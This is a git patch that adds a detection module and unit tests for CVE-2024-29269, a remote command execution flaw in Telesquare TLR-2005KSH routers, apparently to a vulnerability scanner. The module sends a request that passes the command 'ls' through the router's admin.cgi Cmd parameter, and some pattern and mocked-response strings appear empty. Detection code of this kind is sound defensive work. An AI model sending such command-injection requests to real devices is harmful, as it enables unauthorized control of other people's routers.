From 67a414e199e1691854df8077aa3bbeb16f74de36 Mon Sep 17 00:00:00 2001 From: Mohamed Benchikh Date: Mon, 15 Apr 2024 14:16:24 +0100 Subject: [PATCH] Add detection for CVE-2024-29269 --- agent/exploits/cve_2024_29269.py | 36 ++++++++++++ tests/exploits/cve_2024_29269_test.py | 85 +++++++++++++++++++++++++++ 2 files changed, 121 insertions(+) create mode 100644 agent/exploits/cve_2024_29269.py create mode 100644 tests/exploits/cve_2024_29269_test.py diff --git a/agent/exploits/cve_2024_29269.py b/agent/exploits/cve_2024_29269.py new file mode 100644 index 00000000..749b8973 --- /dev/null +++ b/agent/exploits/cve_2024_29269.py @@ -0,0 +1,36 @@ +"""Agent Asteroid implementation for CVE-2024-29269""" + +import re +from agent import definitions +from agent import exploits_registry +from agent.exploits import webexploit + +VULNERABILITY_TITLE = ( + "Telesquare TLR-2005KSH Unauthorized Remote Command Execution Vulnerability" +) +VULNERABILITY_REFERENCE = "CVE-2024-29269" +VULNERABILITY_DESCRIPTION = ( + "Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh " + "versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit " + "this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server " + "permissions." +) +RISK_RATING = "CRITICAL" + + +@exploits_registry.register +class CVE202429269Exploit(webexploit.WebExploit): + accept_request = definitions.Request(method="GET", path="/") + check_request = definitions.Request( + method="GET", path="/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls" + ) + accept_pattern = re.compile("TLR-2005KSH") + match_pattern = re.compile( + "" + ) + metadata = definitions.VulnerabilityMetadata( + title=VULNERABILITY_TITLE, + description=VULNERABILITY_DESCRIPTION, + reference=VULNERABILITY_REFERENCE, + risk_rating=RISK_RATING, + ) diff --git a/tests/exploits/cve_2024_29269_test.py b/tests/exploits/cve_2024_29269_test.py new file mode 100644 index 00000000..8b447b82 --- /dev/null +++ b/tests/exploits/cve_2024_29269_test.py @@ -0,0 +1,85 @@ +"""Unit tests for Agent Asteroid: CVE-2024-29269""" + +import requests_mock as req_mock + +from agent import definitions +from agent.exploits import cve_2024_29269 + + +def testCVE202429269_whenVulnerable_reportFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """CVE-2024-29269 unit test: case when target is vulnerable.""" + requests_mock.get( + "http://localhost:80/", + text="Login to TLR-2005KSH", + status_code=200, + ) + requests_mock.get( + "http://localhost:80/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls", + text=( + '\n' + "\n" + "\n" + "\n" + "\n" + "\n" + "\n" + "\n" + "\n" + "\n" + "\n" + "" + ), + status_code=200, + ) + exploit_instance = cve_2024_29269.CVE202429269Exploit() + target = definitions.Target("http", "localhost", 80) + + accept = exploit_instance.accept(target) + vulnerabilities = exploit_instance.check(target) + + assert accept is True + vulnerability = vulnerabilities[0] + assert ( + vulnerability.entry.title + == "Telesquare TLR-2005KSH Unauthorized Remote Command Execution Vulnerability" + ) + assert vulnerability.technical_detail == ( + "http://localhost:80 is vulnerable to CVE-2024-29269, Telesquare " + "TLR-2005KSH Unauthorized Remote Command Execution Vulnerability" + ) + + +def testCVE202429269_whenSafe_reportNothing( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """CVE-2024-29269 unit test: case when target is safe.""" + exploit_instance = cve_2024_29269.CVE202429269Exploit() + requests_mock.get( + "http://localhost:80/", + text="Login to TLR-2005KSH", + status_code=200, + ) + requests_mock.get( + "http://localhost:80/cgi-bin/admin.cgi", + text="", + status_code=200, + ) + target = definitions.Target("http", "localhost", 80) + + accept = exploit_instance.accept(target) + vulnerabilities = exploit_instance.check(target) + + assert accept is True + assert len(vulnerabilities) == 0